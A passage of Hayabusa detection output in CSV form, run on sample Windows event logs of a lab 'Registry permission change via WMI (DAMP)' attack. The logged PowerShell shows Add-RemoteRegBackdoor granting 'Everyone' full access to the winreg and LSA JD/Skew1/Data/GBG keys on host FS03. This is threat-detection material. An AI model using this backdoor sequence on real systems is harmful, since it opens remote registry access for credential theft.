registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" +2021-12-10 03:50:55.958 +09:00,FS03.offsec.lan,4673,medium,CredAccess | Impact,Process Ran With High Privilege,Process: C:\Windows\System32\wbem\WmiPrvSE.exe | User: hack1 | LID: 0x2a2d532,../hayabusa-rules/hayabusa/default/alerts/Security/4673_PrivilegedServiceCalled_UnknownProcessUsedHighPrivilege.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" +2021-12-10 03:50:55.958 +09:00,FS03.offsec.lan,4673,medium,CredAccess | Impact,Process Ran With High Privilege,Process: C:\Windows\System32\wbem\WmiPrvSE.exe | User: hack1 | LID: 0x2a2d532,../hayabusa-rules/hayabusa/default/alerts/Security/4673_PrivilegedServiceCalled_UnknownProcessUsedHighPrivilege.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" +2021-12-10 03:50:56.005 +09:00,FS03.offsec.lan,4673,medium,CredAccess | Impact,Process Ran With High Privilege,Process: C:\Windows\System32\wbem\WmiPrvSE.exe | User: hack1 | LID: 0x2a2d532,../hayabusa-rules/hayabusa/default/alerts/Security/4673_PrivilegedServiceCalled_UnknownProcessUsedHighPrivilege.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" +2021-12-10 03:50:56.052 +09:00,FS03.offsec.lan,4672,info,,Admin Logon,User: hack1 | LID: 0x2a2f10a,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" +2021-12-10 03:50:56.052 +09:00,FS03.offsec.lan,4624,info,,Logon Type 3 - Network,User: hack1 | Computer: - | IP Addr: 10.23.42.38 | LID: 
0x2a2f10a,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" +2021-12-10 03:50:56.052 +09:00,FS03.offsec.lan,4673,medium,CredAccess | Impact,Process Ran With High Privilege,Process: C:\Windows\System32\wbem\WmiPrvSE.exe | User: hack1 | LID: 0x2a2d532,../hayabusa-rules/hayabusa/default/alerts/Security/4673_PrivilegedServiceCalled_UnknownProcessUsedHighPrivilege.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" +2021-12-10 03:50:56.099 +09:00,FS03.offsec.lan,4673,medium,CredAccess | Impact,Process Ran With High Privilege,Process: C:\Windows\System32\wbem\WmiPrvSE.exe | User: hack1 | LID: 0x2a2d532,../hayabusa-rules/hayabusa/default/alerts/Security/4673_PrivilegedServiceCalled_UnknownProcessUsedHighPrivilege.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" +2021-12-10 03:50:56.146 +09:00,FS03.offsec.lan,4673,medium,CredAccess | Impact,Process Ran With High Privilege,Process: C:\Windows\System32\wbem\WmiPrvSE.exe | User: hack1 | LID: 0x2a2d532,../hayabusa-rules/hayabusa/default/alerts/Security/4673_PrivilegedServiceCalled_UnknownProcessUsedHighPrivilege.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" +2021-12-10 03:51:16.683 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x9e8 | User: FS03$ | LID: 
0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" +2021-12-10 04:54:03.261 +09:00,fs03vuln.offsec.lan,4104,info,,PwSh Scriptblock Log,Add-RemoteRegBackdoor -ComputerName FS03 -Trustee 'S-1-1-0',../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-10 04:54:03.261 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : ] Using trustee username 'Everyone'""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-10 04:54:03.370 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-WmiObject): ""Get-WmiObject"" ParameterBinding(Get-WmiObject): name=""Class""; value=""Win32_Service"" ParameterBinding(Get-WmiObject): name=""Filter""; value=""name='RemoteRegistry'"" ParameterBinding(Get-WmiObject): name=""ComputerName""; value=""FS03""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-10 04:54:03.370 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): 
""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03] Attaching to remote registry through StdRegProv""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-10 04:54:03.370 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-WmiObject): ""Get-WmiObject"" ParameterBinding(Get-WmiObject): name=""Namespace""; value=""root/default"" ParameterBinding(Get-WmiObject): name=""Class""; value=""Meta_Class"" ParameterBinding(Get-WmiObject): name=""Filter""; value=""__CLASS = 'StdRegProv'"" ParameterBinding(Get-WmiObject): name=""ComputerName""; value=""FS03""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-10 04:54:03.386 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg] Backdooring started for key""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-10 04:54:03.417 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg] Creating ACE with 
Access Mask of 983103 (ALL_ACCESS) and AceFlags of 2 (CONTAINER_INHERIT_ACE)""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-10 04:54:03.417 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Management.ManagementClass"" ParameterBinding(New-Object): name=""ArgumentList""; value=""win32_Ace""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-10 04:54:03.435 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg] Creating the trustee WMI object with user 'Everyone'""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-10 04:54:03.435 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Management.ManagementClass"" ParameterBinding(New-Object): name=""ArgumentList""; 
value=""win32_Trustee""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-10 04:54:03.435 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg] Applying Trustee to new Ace""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-10 04:54:03.451 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg] Calling SetSecurityDescriptor on the key with the newly created Ace""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-10 04:54:03.453 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg] Backdooring completed for key""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify 
registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-10 04:54:03.453 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\JD] Backdooring started for key""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-10 04:54:03.453 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\JD] Creating ACE with Access Mask of 983103 (ALL_ACCESS) and AceFlags of 2 (CONTAINER_INHERIT_ACE)""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-10 04:54:03.453 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Management.ManagementClass"" ParameterBinding(New-Object): name=""ArgumentList""; value=""win32_Ace""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-10 04:54:03.468 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" 
ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\JD] Creating the trustee WMI object with user 'Everyone'""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-10 04:54:03.468 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Management.ManagementClass"" ParameterBinding(New-Object): name=""ArgumentList""; value=""win32_Trustee""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-10 04:54:03.468 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\JD] Applying Trustee to new Ace""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-10 04:54:03.468 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\JD] Calling SetSecurityDescriptor on the key with the newly created 
Ace""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-10 04:54:03.486 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\JD] Backdooring completed for key""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-10 04:54:03.486 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\Skew1] Backdooring started for key""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-10 04:54:03.494 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\Skew1] Creating ACE with Access Mask of 983103 (ALL_ACCESS) and AceFlags of 2 (CONTAINER_INHERIT_ACE)""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via 
WMI (DAMP) PowerShell on source.evtx +2021-12-10 04:54:03.494 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Management.ManagementClass"" ParameterBinding(New-Object): name=""ArgumentList""; value=""win32_Ace""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-10 04:54:03.494 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\Skew1] Creating the trustee WMI object with user 'Everyone'""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-10 04:54:03.494 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Management.ManagementClass"" ParameterBinding(New-Object): name=""ArgumentList""; value=""win32_Trustee""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-10 04:54:03.503 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : 
SYSTEM\CurrentControlSet\Control\Lsa\Skew1] Applying Trustee to new Ace""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-10 04:54:03.503 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\Skew1] Calling SetSecurityDescriptor on the key with the newly created Ace""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-10 04:54:03.503 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\Skew1] Backdooring completed for key""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-10 04:54:03.503 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\Data] Backdooring started for key""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify 
registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-10 04:54:03.519 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\Data] Creating ACE with Access Mask of 983103 (ALL_ACCESS) and AceFlags of 2 (CONTAINER_INHERIT_ACE)""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-10 04:54:03.519 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Management.ManagementClass"" ParameterBinding(New-Object): name=""ArgumentList""; value=""win32_Ace""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-10 04:54:03.519 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\Data] Creating the trustee WMI object with user 'Everyone'""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-10 04:54:03.519 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline 
Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Management.ManagementClass"" ParameterBinding(New-Object): name=""ArgumentList""; value=""win32_Trustee""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-10 04:54:03.535 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\Data] Applying Trustee to new Ace""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-10 04:54:03.540 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\Data] Calling SetSecurityDescriptor on the key with the newly created Ace""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-10 04:54:03.540 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\Data] Backdooring completed for 
key""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-10 04:54:03.540 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\GBG] Backdooring started for key""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-10 04:54:03.556 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\GBG] Creating ACE with Access Mask of 983103 (ALL_ACCESS) and AceFlags of 2 (CONTAINER_INHERIT_ACE)""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-10 04:54:03.556 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Management.ManagementClass"" ParameterBinding(New-Object): name=""ArgumentList""; value=""win32_Ace""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry 
permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-10 04:54:03.556 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\GBG] Creating the trustee WMI object with user 'Everyone'""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-10 04:54:03.556 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Management.ManagementClass"" ParameterBinding(New-Object): name=""ArgumentList""; value=""win32_Trustee""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-10 04:54:03.556 